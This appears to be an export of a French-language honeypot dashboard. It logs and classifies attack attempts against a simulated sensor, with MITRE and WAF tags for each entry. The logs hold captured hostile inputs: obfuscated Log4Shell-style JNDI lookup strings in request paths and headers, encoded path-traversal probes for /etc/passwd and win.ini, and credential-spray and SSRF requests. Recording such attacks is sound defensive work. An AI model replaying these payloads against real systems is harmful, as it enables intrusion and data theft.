/${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:-i}${wy:-:}${1b:2q:k0:-l}${t:8:-d}${2lj:ta42:-a}${e:3isf:cv3:-p}${dns:c8:-:}${x5:mp:-/}${bjg:fm58:s:-/}${8zof:-P…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 95 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
Payload (extrait)
PUT /${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:-i}${wy:-:}${1b:2q:k0:-l}${t:8:-d}${2lj:ta42:-a}${e:3isf:cv3:-p}${dns:c8:-:}$
Requête brute (extrait)
PUT /${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:-i}${wy:-:}${1b:2q:k0:-l}${t:8:-d}${2lj:ta42:-a}${e:3isf:cv3:-p}${dns:c8:-:}${x5:mp:-/}${bjg:fm58:s:-/}${8zof:-P}${67q:e4ym:-A}${x:ep8r:t:-l}${yw:-0}${frso:-c}${hj:--}${${3bql:-s}${gaxt:dzi:-y}${9f8:48:-s}
|
|||||||
| TCP | 10255 · KUBELET READONLY | kubelet-readonly | Injection PHP php injection · via KUBELET READONLY:10255 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
KUBELET-READONLY
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
10255
Chemin / cible
—
Service
KUBELET READONLY
Payload
ZSDLKFJ2 /${${t1g:gq:-j}${fvb2:-n}${mr:j:lcif:-d}${u42:y2b:t4:-i}${re7:b2:-:}${bi:7yz:-l}${xwgp:-d}${ktgz:k3:-a}${3q:-p}${x6zr:j
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${t1g:gq:-j}${fvb2:-n}${mr:j:lcif:-d}${u42:y2b:t4:-i}${re7:b2:-:}${bi:7yz:-l}${xwgp:-d}${ktgz:k3:-a}${3q:-p}${x6zr:j
Requête brute (extrait)
ZSDLKFJ2 /${${t1g:gq:-j}${fvb2:-n}${mr:j:lcif:-d}${u42:y2b:t4:-i}${re7:b2:-:}${bi:7yz:-l}${xwgp:-d}${ktgz:k3:-a}${3q:-p}${x6zr:j:3:-:}${8v:7asj:-/}${4r7y:8:-/}${i5y6:y:df0:-P}${v9:-A}${kqwo:f:-l}${0kfc:yruj:-0}${9:-c}${8q:rl:--}${${uk:s6a:-s}${56rm:-y}${hq
|
|||||||
| TCP | 10255 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:10255 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
10255
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; In
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2898 Content-Type: |
|||||||
| TCP | 10255 · HTTP | http | Sonde port 10255/TCP port 10255 tcp · via HTTP:10255 · (sonde / probe) · → /${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:5fg:qj2:-i}${fozu:xa:z:-:}${tlm:wnzd:qxi:-l}${mngr:-… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:5fg:qj2:-i}${fozu:xa:z:-:}${tlm:wnzd:qxi:-l}${mngr:-d}${86se:v9:w:-a}${r2q:7h:19:-p}${s01:-:}${2uq:y21w:l8e:-/}${zpk:0:-/}${ptni:z:-P}${xby:f:-A}${i:bncs:9:-l}${eurw:7:hj:-0}${hq9:-c}${s1k:u:cyn1:--}${${36:2:-s}${m4q:-y}${vy:-s}${yhna:e5t7:q9:-:}${sk5d:pnal:-j}${k2:-a}${j:8w:-v}${snt:uh:l:-a}${hnj:q:-.}${ju2:-v}${dsfo:-e}${oqw8:wul:-r}${9o:l6g:-s}${ab:-i}${my:ejxi:6:-o}${g7l:h:7zi:-n}}${bu:-.}${sm:-f}${zg:7:-2}${zqsw:le4:-f}${l5w:ho3u:-c}${6xj:94s:-7}${mo3:-6}$
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:5fg:qj2:-i}${fozu:xa:z:-:}${tlm:wnzd:qxi:-l}${mngr:-d}${86se:v9:w:-a}${r2q:7h:19:-p}${s01:-:}${2uq:y21w:l8e:-/}$…
Preuve honeypot — Sonde port 10255/TCP
Connexion détectée sur le port 10255 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_10255_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:5fg:qj2:-i}${fozu:xa:z:-:}${tlm:wnzd:qxi:-l}${mngr:-d}${86se:v9:w:-a}${r2q:7h
Requête brute (extrait)
GET /${${5:ju5:bse5:-j}${i5:-n}${b:oi:ud:-d}${ho64:5fg:qj2:-i}${fozu:xa:z:-:}${tlm:wnzd:qxi:-l}${mngr:-d}${86se:v9:w:-a}${r2q:7h:19:-p}${s01:-:}${2uq:y21w:l8e:-/}${zpk:0:-/}${ptni:z:-P}${xby:f:-A}${i:bncs:9:-l}${eurw:7:hj:-0}${hq9:-c}${s1k:u:cyn1:--}${${36
|
|||||||
| TCP | 10255 · HTTP | http | Sonde port 10255/TCP port 10255 tcp · via HTTP:10255 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${ugc:-j}${s7:kywn:-n}${jw:n:-d}${d:-i}${a6:kn:q0:-:}${6xsz:c…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
10255
Chemin / cible
/
Preuve honeypot — Sonde port 10255/TCP
Connexion détectée sur le port 10255 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_10255_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${ugc:-j}${s7:kywn:-n}${jw:n:-d}${d:-i}${a6:kn:q0:-:}${6xsz:cgp:-l}${40:1x:-d}${pdo:ezu:-a}${ye4n:j:-p}${52qz:us1e:cpf:-:}${jyw:ie4:-/}${aqp:-/}${ynu:7:gsd:-U}${t:x:j03d:-A}${4wh:-l}${pm:dhbt:5ai1:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255
Accept: */*
User-Agent: ${${ugc:-j}${s7:kywn:-n}${jw:n:
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: ${${ugc:-j}${s7:kywn:-n}${jw:n:-d}${d:-i}${a6:kn:q0:-:}${6xsz:cgp:-l}${40:1x:-d}${pdo:ezu:-a}${ye4n:j:-p}${52qz:us1e:cpf:-:}${jyw:ie4:-/}${aqp:-/}${ynu:7:gsd:-
|
|||||||
| TCP | 10255 · HTTP | http | Sonde port 10255/TCP port 10255 tcp · via HTTP:10255 · (sonde / probe) · → /${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${r… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${rg:juv9:-i}${8:f:-:}${hi:-l}${1jb:7i:01:-d}${wo2:1:f0… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${rg:juv9:-i}${8:f:-:}${hi:-l}${1jb:7i:01:-d}${wo2:1:f01:-a}${4tg:-p}${7:l6:-:}${cq:y:i6b:-/}${enr:-/}${mr7a:8:-P}${x8g:1n:9yz:-A}${1o4:wei:-l}${ex:b8:6itd:-0}${1je:em6h:r6:-c}${8:--}${${1qg:k:-s}${heta:-y}${9elb:r:-s}${eg3:-:}${pnua:-j}${b8:-a}${6md8:bcq:f78:-v}${50:2n:sw:-a}${b:-.}${uo:-v}${06:csw:-e}${4cy:3dji:-r}${vw:o9g:-s}${8j:-i}${w3bm:yap:-o}${4:vg:vi:-n}}${n:-.}${fmn:rqi:-f}${vti:ax:gx:-2}${c91:c1w:jv7:-f}${3qrl:nzi:h8jv:-c}${xzn:ief:n8pq:-7}${isyj:oa:b:-
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${rg:juv9:-i}${8:f:-:}${hi:-l}${1jb:7i:01:-d}${wo2:1:f01:-a}${4tg:-p}${7:l6:-:}${cq:y:i6b:-/}${enr:-/}${mr7a:8:-P}$…
Preuve honeypot — Sonde port 10255/TCP
Connexion détectée sur le port 10255 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_10255_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${rg:juv9:-i}${8:f:-:}${hi:-l}${1jb:7i:01:-d}${wo2:1:f01:-a}${4tg:-p}${7:l6:-:}$
Requête brute (extrait)
GET /${${10zu:c:-j}${skf:j5:q62:-n}${u2q:8:d:-d}${rg:juv9:-i}${8:f:-:}${hi:-l}${1jb:7i:01:-d}${wo2:1:f01:-a}${4tg:-p}${7:l6:-:}${cq:y:i6b:-/}${enr:-/}${mr7a:8:-P}${x8g:1n:9yz:-A}${1o4:wei:-l}${ex:b8:6itd:-0}${1je:em6h:r6:-c}${8:--}${${1qg:k:-s}${heta:-y}${
|
|||||||
| TCP | 10255 · HTTP | http | Sonde port 10255/TCP port 10255 tcp · via HTTP:10255 · (sonde / probe) | Élevée | Moyen · 49 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/
Preuve honeypot — Sonde port 10255/TCP
Connexion détectée sur le port 10255 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_10255_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 49
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Ma
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${m:-j}${g:-n}${7t:-d}
|
|||||||
| TCP | 10255 · HTTP | http | SSRF interne ssrf internal · via HTTP:10255 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Ma
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 10255 · HTTP | http | Sonde port 10255/TCP port 10255 tcp · via HTTP:10255 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${qk:69:wy:-j}${svwz:1t:j3:-n}${b:n5ws:n8:-d}${6ek5:8qk:-i}${…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/
Preuve honeypot — Sonde port 10255/TCP
Connexion détectée sur le port 10255 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_10255_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${qk:69:wy:-j}${svwz:1t:j3:-n}${b:n5ws:n8:-d}${6ek5:8qk:-i}${ry:8:03h:-:}${y:5dqb:6x:-l}${rh:8u7:-d}${py:xjid:-a}${o1y:-p}${4ayc:4:4ciq:-:}${ej:-/}${c7:-/}${9k:-U}${ng:jlru:-A}${f:jy1:-l}${mpd:zoke…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255
Accept: */*
User-Agent: ${${qk:69:wy:-j}${svwz:1t:j3:-n}
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: ${${qk:69:wy:-j}${svwz:1t:j3:-n}${b:n5ws:n8:-d}${6ek5:8qk:-i}${ry:8:03h:-:}${y:5dqb:6x:-l}${rh:8u7:-d}${py:xjid:-a}${o1y:-p}${4ayc:4:4ciq:-:}${ej:-/}${c7:-/}${9
|
|||||||
| TCP | 8081 · HTTP | http | SSRF interne ssrf internal · via HTTP:8081 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 10255 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:10255 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 10255 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:10255 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10255
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Apple
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8888 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8888 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac |
|||||||
| TCP | 8888 · HTTP | http | SSRF interne ssrf internal · via HTTP:8888 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
HTTP alt 8888 probe
Ligne de requête
User-Agent
